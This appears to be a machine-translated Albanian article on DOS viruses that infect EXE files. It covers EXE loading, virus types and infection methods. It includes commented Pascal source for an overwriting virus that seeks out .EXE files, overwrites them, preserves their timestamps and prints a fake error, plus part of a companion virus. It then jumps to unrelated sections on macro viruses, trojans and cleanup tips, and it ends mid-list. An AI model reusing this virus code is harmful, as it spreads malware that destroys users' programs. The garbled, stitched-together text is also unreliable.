Ky artikull flet për viruset duke infektuar skedarët EXE. Një klasifikim i tillë viruset, shqyrtohen në detaje algoritmet e punës së tyre, dallimet ndërmjet tyre, avantazhet dhe disavantazhet.
Viruset- kjo është gjimnastikë e mirë për mendjen, megjithëse shumë njerëz mendojnë se çfarë të shkruajnë virus në një gjuhë të nivelit të lartë është mjaft e vështirë. Kjo nuk është plotësisht e vërtetë. Të shkruash në Pascal është mjaft e lehtë, por madhësia e kodit është mahnitëse.
Për çdo lloj viruset tekstet burimore paraqiten me komente të hollësishme, si dhe informacione bazë për strukturën dhe parimet e punës programet EXE.
Skedarët COM(programet e vogla të shkruara kryesisht në Assembler) ngadalë por me siguri po vjetërohen. Ato zëvendësohen nga të frikshme në madhësinë e tyre EHE-"Përbindëshat". Ka edhe viruse që mund të infektojnë skedarët EXE.
Struktura dhe procesi i ngarkimit të programit EXE
Ndryshe nga programet COM,programet EXE mund të përbëhet nga disa segmente (kode, të dhëna, stek). Ato mund të jenë më të mëdha se 64 KB. skedar EXE ka një kokë që përdoret kur ngarkohet. Titulli përbëhet nga një pjesë e formatuar që përmban nënshkrimin dhe të dhënat e nevojshme për ngarkimin skedar EXE, dhe tabelat për konfigurimin e adresave ( Tabela e zhvendosjes). Tabela përbëhet nga vlera në segmentin e formatit: offset. Pas ngarkimit të programit në memorie, adresa e segmentit nga e cila është ngarkuar programi duhet të shtohet në kompensimet në modulin e ngarkesës, të cilat tregohen nga vlerat në tabelë.
Në fillimin programet EXE ngarkuesi i sistemit (duke thirrur funksionin DOS 4Bh) kryen veprimet e mëposhtme:
1. Përcaktoi adresën e segmentit të një zone të lirë të memories, madhësinë
e cila është e mjaftueshme për të akomoduar programin.
2. Krijohet dhe plotësohet një bllok memorie për variablat e mjedisit.
3. Krijohet një bllok memorie për PSP-në dhe programin (segmenti SOOOO - PSP;
segment + OOYUOOOOO - program).
Vlerat përkatëse futen në fushat PSP.
4. Adresa DTA është vendosur në PSP: 0080h.
5. Pjesa e formatuar lexohet në zonën e punës të ngarkuesit
drejtimi skedar EXE.
6. Gjatësia e modulit të ngarkimit llogaritet duke përdorur formulën:
Si7.e = ((PageCnt * 5i2) - (HdrSae * i6)) - Pa! TP3ig.
7.Përcaktohet kompensimi i modulit të ngarkimit në skedar, i barabartë me
8. Përllogaritet adresa e segmentit (START_SEG) për ngarkim - zakonisht është PSP + lOh.
9. Moduli i ngarkesës lexohet në memorie (duke filluar nga adresa
START_SEG: 0000).
10. Për çdo hyrje të tabelës së cilësimeve:
a) lexohen fjalët I_OFF dhe I_SEG;
b) llogaritet RELC ^ SEG-START ^ SEG + LSEG;
c) fjala lexohet në adresën RELO_SEG: I_OFF;
d) START_SEG i shtohet fjalës së lexuar;
e) rezultati ruhet në të njëjtën adresë (RELO_SEG: I_OFF).
11. Memoria për programin ndahet në përputhje me MaxMet
12. Regjistrat inicializohen, programi ekzekutohet:
b) AX = rezultat i vërtetimit të identifikuesve të drejtuesve të specifikuar në vijën e komandës;
c) SS ° START_SEG + ReloSS, SP-ExeSP;
d) CS = START_SEG + ReloCS, IP = ExeIP.
Klasifikimi i viruseve EXE
viruset EXE mund të ndahet me kusht në grupe, duke përdorur veçoritë e algoritmit si veçori për ndarje. VirusetMbishkruani) Të tilla viruset tashmë janë bërë një gjë e rrallë. Pengesa e tyre kryesore është puna shumë e ashpër. Programet e infektuara nuk ekzekutohen sepse virus mbishkruan kodin e programit pa e ruajtur atë. Në fillimin virus kërkon viktimën (ose viktimat) e ardhshme, hap skedarin e gjetur për redaktim dhe shkruan trupin e tij në fillim të programit pa ruajtur kodin origjinal. Të infektuar me këto viruset programet nuk i nënshtrohen trajtimit.
Viruset shoqëruese
Këto viruset e kanë marrë emrin nga algoritmi i përhapjes:
krijohet një skedar shoqërues për çdo skedar të infektuar. Le të shqyrtojmë më në detaje dy lloje të viruseve të këtij grupi:
Viruset lloji i parë riprodhohet si më poshtë. Për çdo person të infektuar skedar EXE një skedar me një kod virusi krijohet në të njëjtën direktori dhe ka të njëjtin emër si skedar EXE por me zgjatjen COM. Virus aktivizohet nëse vetëm emri i skedarit të ekzekutueshëm është specifikuar në vijën komanduese gjatë nisjes së programit. Fakti është se nëse shtrirja e skedarit nuk është e specifikuar, DOS fillimisht kërkon direktorinë aktuale për një skedar me emrin dhe shtrirjen e dhënë COM... Nëse Skedari COM me këtë emër nuk u gjet, kërkimi është duke u zhvilluar për të njëjtin emër skedar EXE... Nëse nuk gjendet dhe skedar EXE, DOS do të përpiqet të zbulojë WAT skedar (batch). Nëse nuk ka skedar të ekzekutueshëm me emrin e specifikuar në drejtorinë aktuale, kërkimi kryhet në të gjitha drejtoritë e aksesueshme nga ndryshorja RRUGË... Me fjale te tjera, kur përdoruesi dëshiron të ekzekutojë një program dhe shkruan në vijën komanduese vetëm emrin e tij (në thelb të gjithë e bëjnë këtë), i pari që merr kontrollin është virus kodi i të cilit është në Skedari COM... Ai krijon Skedari COM për një ose më shumë skedarët EXE(përhapet) dhe më pas kryen skedar EXE me emrin e specifikuar në vijën komanduese. Përdoruesi mendon se vetëm vrapimi program EXE.
Për të neutralizuar virusin satelitor mjaft e thjeshtë - thjesht hiqni
Skedari COM.
Viruset lloji i dytë është më delikat. Emri i infektuar
skedar EXE mbetet e njëjtë, dhe shtrirja zëvendësohet me disa
ndryshe nga e ekzekutueshme ( COM, EXE dhe BAT), Për shembull,
skedari mund të marrë shtesën DAT(skedari i të dhënave) ose OVL(pro
mbivendosje gram). Pastaj në vend skedar EXE e kopjuar virale Kodi. Kur niset një program i tillë i infektuar, i jepet kontrolli virale kodi i vendosur në skedar EXE... Duke infektuar një ose më shumë skedarët EXE ne te njejten menyre virus kthen shtesën e ekzekutueshme në skedarin origjinal (por jo E XE dhe COM, për aq sa skedar EXE me këtë emër është i zënë nga një virus), dhe më pas e ekzekuton atë. Kur programi i infektuar përfundon, ekstensioni i paekzekutueshëm kthehet në skedarin e tij të ekzekutueshëm. Dezinfektimi i dosjes i infektuar me këtë lloj virusi mund të jetë i vështirë nëse virus- sateliti kodon një pjesë ose të gjithë trupin e skedarit të infektuar dhe e deshifron atë përpara se ta ekzekutojë.
Viruset të ngulitura në program (Parazitare) Viruset të këtij lloji janë më të padukshmit: kodi i tyre shkruhet në programin e infektuar, gjë që është thelbësore komplikon trajtimin dosje te infektuara. Merrni parasysh metodat e zbatimit Viruset EXE në skedarin EXE.
Mënyrat për të infektuar skedarët EXE
Metoda më e zakonshme e infeksionit skedarët EXE si kjo: trupi shtohet në fund të dosjes virus, dhe koka korrigjohet (duke mbajtur origjinalin) në mënyrë që kur skedari i infektuar të hapet, kontrolli i jepet virus... Duket si një infeksion Skedarët COM, por në vend që të specifikohet kërcimi në fillim të virusit në kod, adresa aktuale e pikës së nisjes së programit korrigjohet. Pas përfundimit të punës, virusi merr adresën origjinale të fillimit të programit nga titulli i ruajtur, shton vlerën e regjistrit DS ose ES (të marrë në fillim të virusit) në komponentin e tij të segmentit dhe transferon kontrollin në adresën e marrë.
Mënyra tjetër - Injektimi i virusit në fillim të skedarit me një zhvendosje kodi
programet. Mekanizmi i infektimit është si më poshtë: trupi të programit të infektuar lexohet në kujtesë, i shkruar në vend të tij kodi viral ndjekur nga kodi programet e infektuara s. Kështu, kodi i programit, si të thuash, "zhvendoset" në skedar nga gjatësia e kodit të virusit. Prandaj emri i metodës - "metoda e zhvendosjes". Kur hapni një skedar të infektuar virus infekton një ose më shumë skedarë. Pas kësaj, ai lexon kodin e programit në memorie, e shkruan atë në një skedar të përkohshëm të krijuar posaçërisht në disk me shtrirjen e skedarit të ekzekutueshëm ( COM ose EXE), dhe më pas ekzekuton atë skedar. Kur programi të ketë mbaruar ekzekutimin, skedari i përkohshëm fshihet. Nëse gjatë krijimit të virusit nuk janë aplikuar metoda shtesë të mbrojtjes, atëherë është shumë e lehtë për të kuruar skedarin e infektuar - thjesht fshini kodin e virusit në fillim të skedarit dhe programi do të funksionojë përsëri. Disavantazhi i kësaj metode është se ju duhet të lexoni të gjithë kodin e programit të infektuar në memorie (dhe ka raste me madhësi më shumë se 1 MB).
Mënyra tjetër për të infektuar skedarët - metoda e transferimit - ka shumë të ngjarë, është më e përsosura nga të gjitha sa më sipër. Virus riprodhohet si më poshtë: kur nis një program i infektuar, trupi virus prej tij lexohet në kujtesë. Pastaj kërkohet një program i pa infektuar. Fillimi i tij lexohet në kujtesë, i barabartë në gjatësi me trupin virus... Trupi është shkruar në këtë vend virus Fillimi i programit nga memoria është i bashkangjitur në fund të skedarit. Prandaj emri i metodës - "metoda e transferimit". Pas virus ka infektuar një ose më shumë skedarë, ai fillon të ekzekutojë programin nga i cili filloi. Për ta bërë këtë, ai lexon fillimin e programit të infektuar, të ruajtur në fund të skedarit dhe e shkruan atë në fillim të skedarit, duke rivendosur funksionalitetin e programit. Pastaj virus heq kodin e fillimit të programit nga fundi i skedarit, duke rivendosur gjatësinë e skedarit origjinal dhe duke ekzekutuar programin. Pasi programi përfundon, virusi përsëri shkruan kodin e tij në fillim të skedarit dhe fillimin origjinal të programit në fund. Madje antiviruset, të cilat kontrollojnë kodin e tyre për integritet, që nga fillimi virus programi ka saktësisht të njëjtin kod si para infektimit.
Viruset duke zëvendësuar kodin e programit ( Mbishkruani) Siç është përmendur tashmë, kjo pikëpamje viruset ka kohë që ka vdekur. Herë pas here ka ende të tilla viruset krijuar në gjuhë montues, por është më tepër një konkurs në shkrimin më të vogël mbishkruani virusin... Aktualisht më i vogli i njohur mbishkruani viruset shkruar nga Kujtesë (grupi Death Virii Crew) dhe merr 22 bajt.
Algoritmi për virusin e mbishkrimit është si më poshtë:
1. Hapni skedarin nga i cili mori kontrollin e virusit.
3. Mbyllni skedarin.
4. Kërkoni me maskë për një skedar të përshtatshëm për infeksion.
5. Nëse nuk gjenden më skedarë, shkoni te hapi 11.
6. Hapni skedarin e gjetur.
7. Kontrolloni nëse skedari i gjetur është i infektuar me këtë virus.
8. Nëse skedari është i infektuar, shkoni te hapi 10.
9. Shkruani kodin e virusit në fillim të skedarit.
10. Mbyllni skedarin (nëse dëshironi, mund të infektoni nga një te të gjithë skedarët
peshkimi në drejtori ose në disk).
11. Shfaqni çdo mesazh gabimi, për shembull, "Përfundim jonormal i programit" ose "Nuk ka memorie të mjaftueshme" - le të mos habitet shumë përdoruesi që programi nuk filloi.
12. Mbyllni programin.
Më poshtë është një listë e një programi që infekton skedarët në këtë mënyrë.
(2048 $ M, 0, 0)
(Përdoren modulet DOS dhe System (moduli i Sistemit i bashkëngjitet çdo programi automatikisht gjatë përpilimit))
(Emri i virusit)
VirEmri = 'Dhimbje';
(Star për të kontrolluar për riinfeksion.
Ai i shtohet skedarit të infektuar menjëherë pas kodit virus}
VirLabel: String = 'Dhimbje! 1;
(Gjatësia e të përpiluarit skedar EXE}
Autori = 'Nazi i pisët / SGWW.';
(Numri i skedarëve të infektuar gjatë një seance)
(Rreth për të përcaktuar nëse ka një kopje virus në skedarin e gjetur)
Virldentifier: Array of Char;
(Ndryshorja e skedarit për të punuar me skedarë)
(Një variabël tjetër i skedarit - megjithëse mund të bëni pa të, do të jetë më e qartë në këtë mënyrë)
(Për emrin e skedarit të gjetur)
TargetFile: PathStr;
(Trupi tampon virus)
VirBuf: Array [-I.VirLen] e Char;
(Për datën / orën e dosjes)
(Numëruesi i numrit të skedarëve të infektuar)
Dirlnfo: SearchRec;
LabelBuf: Array of Char;
(Inicializimi)
LabelBuf: = VirLabel;
LabelBuf: = VirLabel;
LabelBuf: = VirLabel,
LabelBuf: = VirLabel;
LabelBuf: = VirLabel;
(Rivendosim numëruesin e sasisë dosje te infektuara}
(Ne e lidhim variablin e skedarit VirBody me emrin e programit nga i cili filluam)
Cakto (VirBody, ParamStr (O));
(Hap skedarin me ndryshim të madhësisë = 1 bajt)
Rivendos (VirBody, 1);
(Ne lexojmë trupin nga dosja virus te grupi VirBuf)
BlockRead (VirBody VirBuf, VirLen);
(Mbyll skedarin)
(Kërkimi për viktimën)
procedura FindTarget;
(Funksioni kthen True nëse programi i gjetur tashmë është i infektuar dhe False nëse jo tashmë)
funksioni Virus Present: Boolean;
Virus Present: = False;
(Hap skedarin e gjetur)
Cakto (Target, TargetFile);
Rivendos (Objektivi, 1);
(Lëvizni në gjatësinë e trupit virus nga fillimi i dosjes)
Kërko (Target, VirLen);
(Ne lexojmë 5 bajt - nëse skedari tashmë është i infektuar, ka një etiketë virus}
BlockRead (Target, Virldentifier, 5);
Nëse Virldentifier = Virl_abel Pastaj
(Nëse ka një etiketë, atëherë ka gjithashtu virus}
Virus Present: = E vërtetë;
(Procedura e infeksionit)
procedura InfectFile;
(Nëse madhësia e skedarit të gjetur është më e vogël se gjatësia e virusit plus 100 bajt, atëherë dilni nga procedura)
Nëse Sr.Size< VirLen+100 Then Exit;
Nëse programi i gjetur nuk është ende i infektuar, ne e infektojmë atë)
Nëse Jo Virus Present Atëherë
(Le të kujtojmë datën dhe orën e skedarit. Nuk ka nevojë të mbani mend atributet, pasi kërkimi kryhet midis skedarëve me atributin Archive, dhe ky atribut vendoset në skedar pas ruajtjes në çdo rast)
(Hapja për infeksion)
Cakto (Target, TargetFile);
Rivendos (Objektivi, 1);
(Ne shkruajmë trupin virus deri në fillim të skedarit)
BlockWrite (Target, VirBuf, VirLen);
(Lëvizim treguesin e pozicionit aktual dhe gjatësisë virus nga fillimi i dosjes)
Kërko (Target, VirLen);
(Ne futim etiketën e infeksionit)
BlockWrite (Target, LabelBuf, 5);
(Vendosni datën dhe orën e skedarit)
SetFTime (Synimi, Koha);
(Mbyll)
(E rrisim banakun dosje te infektuara}
(Fillimi i procedurës FindTarget)
(Ne jemi duke kërkuar për skedarë në drejtorinë aktuale me maskë * .EXE
me atribute Arkivi}
FindFirstF.EXE ', Arkivi, Sr);
(Për sa kohë që ka skedarë për të infektuar)
Ndërsa DosError = 0 Do
Nëse Sr.Name = "Atëherë Dil;
(Ne kujtojmë emrin e skedarit të gjetur në variablin TargetFile)
TargetFile: = Sr.Emri;
(Ne e quajmë procedurën e infeksionit)
(Nëse skedarët InfCount janë infektuar, plotësoni kërkimin)
Nëse InfFiles> InfCount Pastaj Dilni;
(Ne po kërkojmë skedarin tjetër me maskë)
(Trupi kryesor)
(duke inicializuar)
(Ne kërkojmë viktima dhe i infektojmë)
(Duke shfaqur një mesazh gabimi)
WriteLn ('Përfundim jonormal i programit.');
(Kjo është që kompajleri të fusë konstantet VirName dhe Author në kod, ndërsa kushti është vendosur në atë mënyrë që këto rreshta të mos shfaqen kurrë në ekran)
WriteLn (VirEmri);
WriteLn (Autor);
Viruset shoqëruese
Viruset satelitore tani i përhapur - raporti i shoqëruesit me parazitarin viruset afërsisht një deri në dy. Infeksioni nga krijimi Skedari COM shoqërues Kuptimi i kësaj metode është pa prekur "macen e të huajit" ( program EXE), krijoni "tutën" - Skedari COM Me emër programet EXE... Algoritmi i tillë virus jashtëzakonisht e thjeshtë, pasi nuk ka nevojë për veprime të panevojshme (për shembull, duke kursyer gjatësinë e përpilimit skedar EXE Me kodi viral duke lexuar në buferin e trupit virus, duke nisur skedarin nga i cili virus mori kontrollin). Ju as nuk keni nevojë të ruani një etiketë për të përcaktuar nëse një skedar është infektuar.
Infeksioni kryhet duke përdorur procesorin e komandës:
1.Nëse ka parametra në vijën e komandës, ruajini ato në një variabël String për t'i kaluar në programin e infektuar.
2. Gjeni skedar EXE- sakrifica.
3.Kontrollo nëse drejtoria me të gjeturat skedar EXE Skedari COM me të njëjtin emër si dosja e viktimës.
4.Nëse e tillë Skedari COM aktualisht, skedari është tashmë i infektuar, shkoni te
në pikën 6.
5. Duke përdorur procesorin e komandës, kopjoni skedarin nga i cili
kontrolli i marrë, në një skedar me emrin dhe shtrirjen e viktimës COM.
6.Procedura Kështu ngarkoni dhe ekzekutoni një skedar me emrin e fillimit, por me shtesën ЕХЕ- domethënë, ekzekutoni programin e infektuar.
7. Kthejeni kontrollin në DOS.
Lista e mëposhtme tregon infeksionin e skedarëve me këtë
(2048 $ M, 0, 0)
(Përdoren modulet DOS dhe System (moduli i Sistemit është automatikisht
lidhet me çdo program në kompilim))
(Emri i virusit)
VirEmri = 'Guesf;
Autori = 'Nazi i pistë / SGWW. 4 vetëm PVT!';
(Sasi i infektuar për një seancë skedarësh)
(Për emrin e skedarit të gjetur)
TargetFile: PathStr;
Një virus kompjuterik mund të prishet, d.m.th. modifikoni në mënyrë të pahijshme çdo skedar në disqet e kompjuterit tuaj. Por virusi mund të "infektojë" disa lloje skedarësh. Kjo do të thotë që një virus mund të "infiltrojë" në këto skedarë, d.m.th. modifikojini ato në mënyrë që të përmbajnë një virus që, në disa rrethana, mund të fillojë të funksionojë. Duhet të theksohet se tekstet e programeve dhe versionet e vjetra të dokumenteve (si të thuash versionet DOS), skedarët e informacionit të bazave të të dhënave, tabelat e përpunuesve të tabelave (versionet e DOS) dhe skedarët e tjerë të ngjashëm nuk mund të infektohen nga një virus, ai vetëm mund të prishet. ato.
Llojet e mëposhtme të skedarëve mund të "infektohen" nga një virus:
1) Skedarët e ekzekutueshëm
Skedarët e ekzekutueshëm, d.m.th. skedarë me shtesat e emrit COM dhe EXE, si dhe skedarët e mbivendosur të ngarkuar kur ekzekutohen programe të tjera. Viruset që infektojnë skedarët quhen viruse të skedarëve. Virusi në skedarët e ekzekutueshëm të infektuar fillon punën e tij kur niset programi në të cilin ndodhet. Më të rrezikshmit janë ato viruse të skedarëve që mbeten rezidentë në memorie pasi të lëshohen. Këta viruse mund të infektojnë skedarët dhe t'i dëmtojnë ato deri në rinisjen e ardhshme të kompjuterit. Dhe nëse ata infektojnë ndonjë program të nisur nga skedari AUTOEXEC.BAT ose CONFIG.SYS, atëherë kur të rindizni nga hard disku, virusi do të fillojë përsëri punën e tij.
2) Regjistrimi i ngarkuesit të sistemit operativ dhe kryesor i nisjes së diskut të ngurtë
Viruset që infektojnë këto zona quhen viruse boot, ose viruse të rrënojave. Një virus i tillë fillon punën e tij në fillimin fillestar të sistemit operativ dhe bëhet rezident i memories, d.m.th. qëndron në memorien e kompjuterit. Mekanizmi i shpërndarjes - infektimi i të dhënave të nisjes së disketave të futura në kompjuter. Në mënyrë tipike, këto viruse kanë dy pjesë, sepse të dhënat e nisjes janë të vogla dhe është e vështirë të akomodohet i gjithë programi i virusit në to. Pjesa e virusit që nuk përshtatet në to ndodhet në një pjesë tjetër të diskut, për shembull, në fund të drejtorisë rrënjësore të diskut ose në një grup në zonën e të dhënave të diskut (zakonisht një grupi deklarohet i dëmtuar në mënyrë që programi i virusit të mos mbishkruhet kur të dhënat shkruhen në disk).
3) Drejtuesit e pajisjes:
Drejtuesit e pajisjes, d.m.th. skedarët e specifikuar në klauzolën DEVICE të skedarit CONFIG.SYS. Virusi në to fillon punën e tij me çdo hyrje në pajisjen përkatëse. Viruset që infektojnë drejtuesit e pajisjes janë shumë të rrallë sepse drejtuesit rrallë rishkruhen nga një kompjuter në tjetrin. E njëjta gjë vlen edhe për skedarët e sistemit DOS (MSDOS.SYS dhe IO.SYS) - infeksioni i tyre është gjithashtu teorikisht i mundur, por është i paefektshëm për përhapjen e viruseve.
4) viruset INTERNET
Kohët e fundit, me një rritje të numrit të përdoruesve janë shfaqur. Disa nga varietetet e këtyre viruseve janë:
4.1 Skedarët e bashkangjitur... Merrni parasysh një skenar tipik: ju merrni një email me një dokument Microsoft WORD të bashkangjitur si bashkëngjitje. Sigurisht, do të dëshironi të njiheni shpejt me përmbajtjen e skedarit, pasi kur përdorni shumicën e programeve moderne të postës, thjesht duhet të klikoni në emrin e këtij skedari.
DHE KY ËSHTË NJË GABIM!
Nëse skedari përmban një virus makro (dhe viruse të këtij lloji që infektojnë Microsoft WORD, dokumentet e Microsoft EXCEL dhe një sërë sistemesh të tjera të njohura të menaxhimit të dokumenteve janë përhapur së fundmi), ai do të infektojë menjëherë sistemin tuaj. Pra, çfarë bëni me dokumentin e bashkangjitur? Kaloni disa sekonda shtesë: ruajeni në disk, kontrollojeni me programin më të fundit antivirus dhe vetëm atëherë, nëse nuk ka viruse, hapeni. Ka zgjidhje të tjera. Për shembull, ka programe antivirus që kontrollojnë automatikisht emailet në hyrje. Nëse përdorni një program mbikëqyrës, atëherë kur hapni një skedar të infektuar, patjetër do të merrni një paralajmërim (më saktë, thjesht nuk do t'ju lejohet të hapni një skedar të infektuar). Në fund të fundit, roja është plotësisht indiferent nëse e hapni dokumentin drejtpërdrejt ose "nga poshtë" programin e postës.
4.2 Trojans... Trojanët e njohur që përhapen në internet janë në thelb mjete ndihmëse për administrimin e kompjuterit në distancë. E thënë thjesht, përmes një programi të tillë, një sulmues mund të ketë akses në kompjuterin tuaj dhe të kryejë operacione të ndryshme (pothuajse çdo) në të pa dijeninë dhe pjesëmarrjen tuaj.
Një përfaqësues tipik i tipit të përshkruar është programi BASK ORIFICE (BO). BO është një sistem administrimi në distancë që lejon përdoruesin të kontrollojë kompjuterët duke përdorur një tastierë konvencionale ose guaskë grafike. "Në një rrjet lokal ose nëpërmjet internetit, një VO i ofron përdoruesit më shumë mundësi në një kompjuter WINDOWS të largët sesa vetë përdoruesi i këtij kompjuteri" është një tekst nga një reklamë "reklamë" në një nga faqet e internetit të hakerit. Sigurisht, mundësia e administrimit në distancë të kompjuterit tuaj është një rrezik serioz, por jo aq i madh sa duket në shikim të parë. Përdoruesit e rregullt nuk shpenzojnë shumë kohë në internet (cilësia e linjave telefonike kontribuon në këtë), dhe çfarë është kaq "interesante" nga këndvështrimi i një hakeri që mund të bëni në kompjuterin tuaj? Rezulton se mundesh, por nuk ke nevojë të administrosh asgjë. Me interes të rëndësishëm për një haker janë fjalëkalimet që përdorni për të punuar me serverin e ofruesit. Pasi të ketë marrë një fjalëkalim, një haker mund të "shkapërderdh" lehtësisht të gjitha paratë tuaja. Për fat të mirë, ka mjaft Trojan të aftë për të kryer këto funksione, dhe të gjithë ata zbulohen me sukses nga programet antivirus.
4.3 Viruset HTML. Viruset e këtij lloji janë të rrallë, ndaj informacioni rreth tyre është më shumë me interes “akademik” sesa praktik. Përfundimi është ky: në vetë gjuhën HTML, e cila përdoret për të shënuar dokumentet e hipertekstit, sigurisht që nuk mund të shkruhen viruse. Por për të krijuar faqe dinamike, për të organizuar ndërveprimin e përdoruesit dhe veprime të tjera, përdoren insertet programatike (skriptet) në dokumentet HTML. Viruset e njohur HTML përdorin skriptet e shkruara në gjuhën VISUAL BASIC. Me ndihmën e tyre, gjen skedarë HTM dhe HTML në makinën lokale dhe u shkruan atyre. Ndonjëherë këto viruse manifestohen në një farë mënyre (për shembull, shfaqin mesazhe). Përhapja e vogël e viruseve të këtij lloji (si dhe numri i tyre i vogël) lehtësohet nga fakti se në cilësimet standarde të shfletuesit, ekzekutimi i skripteve "të rrezikshme" (përfshirë ato në të cilat aksesohen skedarët në kompjuterin lokal) janë të ndaluara. Skriptet e rregullta "sigurie" nuk mund të kryejnë manipulimet e përshkruara.
4.4 Viruset Java... Aktualisht, ekzistojnë dy viruse të njohur të shkruar në gjuhën JAVA. Ata praktikisht nuk janë të rrezikshëm. Le të shpjegojmë shkurtimisht se çfarë është çështja: modulet e ekzekutueshme të programeve të shkruara në JAVA (skedarët CLASS) janë dy llojesh: aplikacione dhe aplikacione. Aplikacionet funksionojnë nën kontrollin e interpretuesit dhe janë programe pothuajse të zakonshme (pothuajse, sepse ato ende kanë disa kufizime, për shembull, në fushën e punës me kujtesën). Appletet, ndryshe nga aplikacionet, mund të ekzekutohen nën kontrollin e shfletuesve, por atyre u vendosen kufizime shumë më serioze të sigurisë: apletet, në veçanti, nuk kanë pothuajse asnjë akses në sistemin e skedarëve të kompjuterit (ndryshe nga rasti me skriptet, çaktivizoni këtë kufizim në shfletuesi i pamundur), kështu që viruset JAVA mund të dizajnohen vetëm si aplikacione dhe nuk paraqesin ndonjë rrezik për shumicën dërrmuese të përdoruesve. Në mënyrë tipike, çdo lloj i veçantë virusi mund të infektojë vetëm një ose dy lloje skedarësh. Viruset më të zakonshëm janë ata që infektojnë skedarët e ekzekutueshëm. Disa viruse infektojnë vetëm skedarët EXE, disa infektojnë vetëm COM, dhe shumica të dyja. Viruset e çizmeve janë në vendin e dytë për sa i përket prevalencës. Disa viruse infektojnë si skedarët ashtu edhe zonat e nisjes së diskut. Viruset që infektojnë drejtuesit e pajisjes janë jashtëzakonisht të rrallë; zakonisht viruse të tillë janë në gjendje të infektojnë edhe skedarët e ekzekutueshëm.
Makroviruset janë mjete potencialisht të padëshiruara të shkruara në gjuhë mikro që janë të integruara në sistemet grafike dhe të përpunimit të tekstit. Cilat skedarë infektojnë makro viruset? Përgjigja është e qartë. Versionet më të zakonshme për Microsoft Excel, Word dhe Office 97. Këta viruse janë mjaft të zakonshëm, si t'i krijoni ato aq lehtë sa granatimet e dardhave. Kjo është arsyeja pse duhet të jeni jashtëzakonisht të kujdesshëm dhe të saktë kur shkarkoni dokumente nga Interneti. Shumica e përdoruesve i nënvlerësojnë ato, duke bërë kështu një gabim të madh.
Si infektohet një PC?
Pasi të kemi vendosur se çfarë janë makro viruset, le të shohim se si depërtojnë në sistem dhe infektojnë kompjuterin. Një mënyrë e thjeshtë e riprodhimit të tyre lejon goditjen e numrit maksimal të objekteve në kohën më të shkurtër të mundshme. Falë aftësive të gjuhëve makro, kur mbyllni ose hapni një dokument të infektuar, ato depërtojnë në programet që aksesohen.
Kjo do të thotë, kur përdorni një redaktues grafik, makro viruset infektojnë gjithçka që lidhet me të. Për më tepër, disa janë aktivë gjatë gjithë kohës ndërsa redaktori i tekstit ose grafiku është duke punuar, ose edhe derisa kompjuteri të fiket plotësisht.
Cili është parimi i punës së tyre
Veprimi i tyre zhvillohet sipas parimit të mëposhtëm: kur punoni me dokumente, Microsoft Word ekzekuton komanda të ndryshme që jepen në gjuhën makro. Para së gjithash, programi depërton në shabllonin kryesor, përmes të cilit hapen të gjithë skedarët e këtij formati. Në këtë rast, virusi kopjon kodin e tij në makro që ofrojnë akses në parametrat kryesorë. Pas daljes nga programi, skedari ruhet automatikisht në pikë (përdoret për të krijuar dokumente të reja). Pastaj futet në makro standarde, duke u përpjekur të përgjojë komandat e dërguara në skedarë të tjerë, duke i infektuar edhe ato.
Infeksioni kryhet në rastet e mëposhtme:
- Nëse virusi ka një makro automatike (kryhet në modalitetin automatik kur programi fiket ose fillon).
- Virusi ka një makro bazë të sistemit (shpesh i lidhur me artikujt e menysë).
- Aktivizohet automatikisht kur shtypni butona ose kombinime specifike.
- Shumëzohet vetëm kur fillon.
Viruse të tilla zakonisht infektojnë të gjithë skedarët e krijuar dhe të lidhur me programet në gjuhën makro.
Çfarë dëmi bëjnë
Makroviruset nuk duhet të nënvlerësohen, pasi ato konsiderohen si viruse të plota dhe shkaktojnë dëm të konsiderueshëm për kompjuterët. Ata mund të fshijnë, kopjojnë ose modifikojnë lehtësisht çdo objekt që përmban, përfshirë informacionin personal. Për më tepër, ata gjithashtu kanë qasje në transferimin e informacionit te njerëzit e tjerë përmes postës elektronike.
Shërbimet më të forta në përgjithësi mund të formatojnë hard disqet dhe të kontrollojnë funksionimin e të gjithë kompjuterit. Kjo është arsyeja pse mendimi se ky lloj virusesh kompjuterike përbëjnë një kërcënim ekskluzivisht për redaktuesit grafikë dhe tekstualë është i gabuar. Në fund të fundit, shërbimet si Word dhe Excel punojnë së bashku me një sërë të tjerash, të cilat në këtë rast janë gjithashtu në rrezik.
Njohja e një skedari të infektuar
Shpesh nuk është e vështirë të identifikosh skedarët që janë infektuar me makro viruse dhe i janë nënshtruar ndikimit të tyre. Në fund të fundit, ato funksionojnë krejtësisht ndryshe nga shërbimet e tjera të të njëjtit format.
Rreziku mund të identifikohet nga shenjat e mëposhtme:
Përveç kësaj, kërcënimet shpesh zbulohen lehtësisht vizualisht. Zhvilluesit e tyre zakonisht ofrojnë informacione të tilla si emri i programit, kategoria, subjekti i komentit dhe emri i autorit në skedën "Përmbledhje", gjë që e bën shumë më të shpejtë dhe më të lehtë heqjen e virusit makro. Mund të thirret duke përdorur menunë e kontekstit.
Metodat e heqjes
Nëse gjeni një skedar ose dokument të dyshimtë, fillimisht skanoni atë me një antivirus. Nëse zbulohet një kërcënim, antivirusët do të përpiqen ta kurojnë atë, dhe nëse dështon, ata do të mbyllin plotësisht aksesin në të.
Nëse i gjithë kompjuteri është infektuar, duhet të përdorni një disk boot urgjent që përmban një antivirus me bazën e të dhënave më të fundit. Ai do të skanojë hard diskun tuaj dhe do të neutralizojë të gjitha kërcënimet që gjen.
Nëse nuk mund të mbroheni në këtë mënyrë, antivirusi juaj nuk mund të bëjë asgjë dhe nuk ka disk shpëtimi, atëherë duhet të provoni metodën e trajtimit "manual":
Kështu, ju do të hiqni makro virusin nga dokumenti i infektuar, por kjo në asnjë mënyrë nuk do të thotë se ai nuk ka mbetur në sistem. Kjo është arsyeja pse rekomandohet, sa më shpejt të jetë e mundur, të skanoni të gjithë kompjuterin personal dhe të gjitha të dhënat e tij me një antivirus ose (përparësia e tyre është se nuk kërkojnë instalim).
Procesi i shërimit dhe pastrimit të një kompjuteri nga infeksioni me makro viruse është mjaft i ndërlikuar, kështu që është më mirë të parandaloni infeksionin në fazat fillestare.
Kështu, ju do të jeni të sigurt dhe makro viruset nuk do të depërtojnë kurrë në skedarët përkatës.
Video për pastrimin e sistemit nga viruset
Duke përdorur këshillat "Si të pastroni një kompjuter të infektuar" të dhëna në këtë artikull, mund të hiqni çdo lloj malware nga kompjuteri juaj dhe ta ktheni atë në gjendje pune.
1. Sigurohuni që kompjuteri juaj është vërtet i infektuar
